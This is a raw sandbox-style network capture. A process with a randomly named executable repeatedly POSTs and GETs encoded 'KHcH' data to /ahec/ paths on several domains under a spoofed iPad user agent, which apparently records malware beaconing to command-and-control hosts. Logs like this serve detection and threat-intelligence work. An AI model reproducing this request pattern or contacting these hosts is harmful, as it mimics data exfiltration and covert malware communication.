                                                                          Date: Sat, 02 Dec 2023 17:48:46 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          ETag: W/"64f9f107-377d8"
                                                                          Content-Encoding: gzip


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          11 | 192.168.2.5 | 49730 | 37.140.192.89 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:48:49.103190899 CET | 1830 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.makeinai.online
                                                                          Origin: http://www.makeinai.online
                                                                          Referer: http://www.makeinai.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:48:49.331998110 CET | 1340 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: nginx
                                                                          Date: Sat, 02 Dec 2023 17:48:49 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          ETag: W/"64f9f107-377d8"
                                                                          Content-Encoding: gzip


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          12 | 192.168.2.5 | 49731 | 37.140.192.89 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:48:51.853564024 CET | 519 | OUT | GET /ahec/?KHcH=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0uXSPTvTu0ZjA==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.makeinai.online
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:48:52.073931932 CET | 1340 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: nginx
                                                                          Date: Sat, 02 Dec 2023 17:48:51 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 227288
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          ETag: "64f9f107-377d8"
                                                                          Data Ascii: ******************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modul
                                                                          Dec 2, 2023 18:48:52.075373888 CET1340INData Raw: 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 69 6e 69 74 69 61 6c 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 62 2d 70 72 69 63 65 5f 5f 63 75 72 72 65 6e 63 79 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73
                                                                          Data Ascii: vertical-align:initial;text-align:left}.b-price__currency{display:inline-block;position:relative;top:3px;border-bottom:1px solid #fff;font:14px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;text-decoration:none}.b-price__currency_co
                                                                          Dec 2, 2023 18:48:52.075388908 CET1340INData Raw: 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 62 6f 72 64 65 72 2d 72 61 64 69
                                                                          Data Ascii: r:pointer;display:inline-block;text-decoration:none;white-space:nowrap;border-radius:3px;font-weight:700;font-family:Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;color:#fff;text-align:center;-webkit-user-select:none;-moz-user-selec
                                                                          Dec 2, 2023 18:48:52.305774927 CET1340INData Raw: 64 74 68 3a 61 75 74 6f 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 61 64 61 70 74 69 76 65 7b 64 69 73 70 6c 61 79 3a 69
                                                                          Data Ascii: dth:auto}@media (min-width:1024px){.is_adaptive .b-button_style_adaptive{display:inline-block;width:auto}}.b-button_style_bordered{border:1px solid transparent}.b-button_bold_none{font-weight:400}.b-button_radius_none{border-radius:0}.b-button


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          13 | 192.168.2.5 | 49732 | 131.153.147.90 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:48:58.991708040 CET | 803 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.instantconvey.com
                                                                          Origin: http://www.instantconvey.com
                                                                          Referer: http://www.instantconvey.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=fGFjl9hS4wS+iTIjzNBxOxFUw9O2cA2PVeH1ea1wxvFamxfy1FP7EyWHiBlbUqgKrX+XkhaRjeUM7e52IhDrUXgg8taayFa2P+zE+/pzV7wOiZGtFItz0kBafnZWaf8FymYXU6bNZLog7Nf96s5XO6C5sHcYcm3RuOkJrG5fgC2T31z2OQ==
                                                                          Dec 2, 2023 18:48:59.095890045 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:48:59 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          14 | 192.168.2.5 | 49733 | 131.153.147.90 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:49:01.622828007 CET | 823 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.instantconvey.com
                                                                          Origin: http://www.instantconvey.com
                                                                          Referer: http://www.instantconvey.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=fGFjl9hS4wS+jzYjgepxbBFbsNO2Tg2LVeb1efM1x9xamU7y7kP7DyWHphlSeKgRrXylkhmRjeQM7ax2dCroG3giwNaL9la2P+zE+/skV7oOip2tKNBw5EBbYnZWMf8BymZ0U4/zZJQg7Mv90edWH6C3oHd0MHfBj+Ynrlw+0Tjn/AflJtUqZn9gmvn4D8KxPYKJMew=
                                                                          Dec 2, 2023 18:49:01.726747036 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:01 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          15 | 192.168.2.5 | 49734 | 131.153.147.90 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:49:04.248852968 CET | 1836 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.instantconvey.com
                                                                          Origin: http://www.instantconvey.com
                                                                          Referer: http://www.instantconvey.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:49:04.354300022 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:04 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          16 | 192.168.2.5 | 49735 | 131.153.147.90 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:49:06.872297049 CET | 521 | OUT | GET /ahec/?Vjk=-N-tntX&KHcH=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClw6x6iQ2E33Xw== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.instantconvey.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:49:06.975440025 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:06 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          17 | 192.168.2.5 | 49736 | 94.23.162.163 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:49:12.450757980 CET | 818 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.domainappraisalbot.com
                                                                          Origin: http://www.domainappraisalbot.com
                                                                          Referer: http://www.domainappraisalbot.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=WDRpQvXLf5KbzDhe8sZKH+nNsFO0b4x5lEtrmZrWKKEb2Gr+pZAc5DjAw7QYfCHXA1wY332tTZk3UcG0vcIawL87NDdA642uqmQ2EyrzFiOkh9o17jUWgPsSEf+5ZgC86LcIXaVko37KrMPoacoT3okUPyFl151FuWFqvT5nI2T22CouZA==


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          18 | 192.168.2.5 | 49737 | 94.23.162.163 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:49:15.153484106 CET | 838 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.domainappraisalbot.com
                                                                          Origin: http://www.domainappraisalbot.com
                                                                          Referer: http://www.domainappraisalbot.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=WDRpQvXLf5KbpiRewtZKGenOwVO0UYx9lDlrmcTGJ4Qb4DX+oYAc+DjA7bQdbCG6A1Mh3z2tTZg3Ud20oqAZyb89CjdG3Y2uqmQ2Ey/JFmikmMY16G0XhPsRSP+5dgC46Lc2XeVOo1zKrJjoZNoU5okaFSF78Js81Wlqqhc0Umed+3E9e08POysaP05ayJchoafAsJs=


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          19 | 192.168.2.5 | 49738 | 94.23.162.163 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:49:17.859364033 CET | 1851 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.domainappraisalbot.com
                                                                          Origin: http://www.domainappraisalbot.com
                                                                          Referer: http://www.domainappraisalbot.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          20 | 192.168.2.5 | 49739 | 94.23.162.163 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:49:20.565393925 CET | 526 | OUT | GET /ahec/?KHcH=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JEVJR030KrPkQ==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.domainappraisalbot.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:49:20.746985912 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                          Date: Sat, 02 Dec 2023 17:49:20 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 178
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          21 | 192.168.2.5 | 49740 | 66.29.155.54 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:49:27.372802973 CET | 788 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.nesmalt.info
                                                                          Origin: http://www.nesmalt.info
                                                                          Referer: http://www.nesmalt.info/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=ORDmYl44AESwkF+B3ybxO1+wUHNIHFFgCR1isUVEz41lMihcDocaejvvBMKLAgFdCgjcOg4XUOuUGf633XpWbMziV7LUKgkDPAbMt8kJYGOis7ita4x2mzY9ynXEjpO0/9MwHtsv/vada6LQAWibwjodCeC8u61CeYiAVrHNeTkG2ktjkQ==
                                                                          Dec 2, 2023 18:49:27.646137953 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:27 GMT
                                                                          Server: Apache
                                                                          Content-Length: 5278
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                          Dec 2, 2023 18:49:27.646183968 CET | 1340 | IN
                                                                          Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                          Dec 2, 2023 18:49:27.646190882 CET | 1340 | IN
                                                                          Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                          Dec 2, 2023 18:49:27.646199942 CET | 1340 | IN
                                                                          Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                          Dec 2, 2023 18:49:27.646265984 CET | 333 | IN
                                                                          Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          22 | 192.168.2.5 | 49741 | 66.29.155.54 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:49:30.064155102 CET | 808 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.nesmalt.info
                                                                          Origin: http://www.nesmalt.info
                                                                          Referer: http://www.nesmalt.info/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=ORDmYl44AESw2UOB0RzxG1+zYnNINlFkCRpisVQfzKRlNDRcCtoadjvvKsKXdwFGCgehOhUXUO6UGdS32mpRaczgebLSEAkDPAbMt8heYCqiwaStIpx54DY+7HXEnpP9/9MSHvIF/qGda/3QBDWEpzobN+DXuJELT7eyQbS7NRQRzxBwjhwnrg8nG8QxQK924Xbu3SE=
                                                                          Dec 2, 2023 18:49:30.330429077 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:30 GMT
                                                                          Server: Apache
                                                                          Content-Length: 5278
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                          Dec 2, 2023 18:49:30.330456972 CET | 1340 | IN
                                                                          Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                          Dec 2, 2023 18:49:30.330468893 CET | 1340 | IN
                                                                          Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                          Dec 2, 2023 18:49:30.330482960 CET | 1340 | IN
                                                                          Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                          Dec 2, 2023 18:49:30.330497026 CET | 333 | IN
                                                                          Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          23 | 192.168.2.5 | 49742 | 66.29.155.54 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:49:32.758419991 CET | 1821 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.nesmalt.info
                                                                          Origin: http://www.nesmalt.info
                                                                          Referer: http://www.nesmalt.info/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
